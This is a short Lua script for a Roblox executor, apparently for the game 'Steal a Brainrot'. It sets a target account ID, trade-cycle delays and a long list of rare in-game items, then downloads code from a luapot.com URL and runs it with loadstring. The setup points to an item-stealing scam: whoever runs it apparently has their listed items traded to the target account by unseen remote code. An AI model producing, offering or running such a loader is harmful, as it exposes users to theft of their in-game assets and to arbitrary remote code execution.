getgenv().SECRET_KEY = "mrr_2e1a0bcd86cb41e580831ac1eb6166e4"
getgenv().TARGET_ID = 3826323047
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Garama and Madundung"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Griffin"] = true,
    ["Skibidi Toilet"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["Celestial Pegasus"] = true,
    ["La Supreme Combinasion"] = true,
    ["Love Love Bear"] = true,
    ["Cerberus"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["Cooki and Milki"] = true,
    ["Capitano Moby"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Sekolahs"] = true,
    ["Signore Carapace"] = true,
    ["La Casa Boo"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Food Combinasion"] = true,
    ["Elefanto Frigo"] = true,
    ["Ginger Gerat"] = true,
    ["Spooky and Pumpky"] = true,
    ["Sammyni Fattini"] = true,
    ["Cloverat Clapat"] = true,
    ["Festive 67"] = true,
    ["Los Spaghettis"] = true,
    ["Antonio"] = true,
    ["Duggy Bros"] = true,
    ["Globa Steppa"] = true,
    ["Fishino Clownino"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Dug dug dug"] = true,
    ["Rico Dinero"] = true,
    ["Los Tacoritas"] = true,
    ["Tralaledon"] = true,
    ["Chillin Chili"] = true,
    ["Money Money Reindeer"] = true,
    ["Celularcini Viciosini"] = true,
    ["Guest 666"] = true,
    ["Fragola La La La"] = true,
    ["Digi Narwhal"] = true,
    ["Bunny and Eggy"] = true,
    ["Cash or Card"] = true,
    ["Kalika Bros"] = true,
    ["Los Chillis"] = true,
    ["Hydra Bunny"] = true,
    ["Boppin Bunny"] = true,
    ["Gym Bros"] = true,
    ["Quackini Snackini"] = true,
    ["Los Hackers"] = true,
    ["Money Money Bros"] = true,
    ["Jelly Moby"] = true,
    ["Sammyni Cakini"] = true,
    ["Dragon Aquanini"] = true,
    ["Steakini Fattini"] = true
   
}
task.spawn(function()
loadstring(game:HttpGet("https://luapot.com/api/loadstring/26c4a4331358247078ffc36b7a17d913"))()
end)
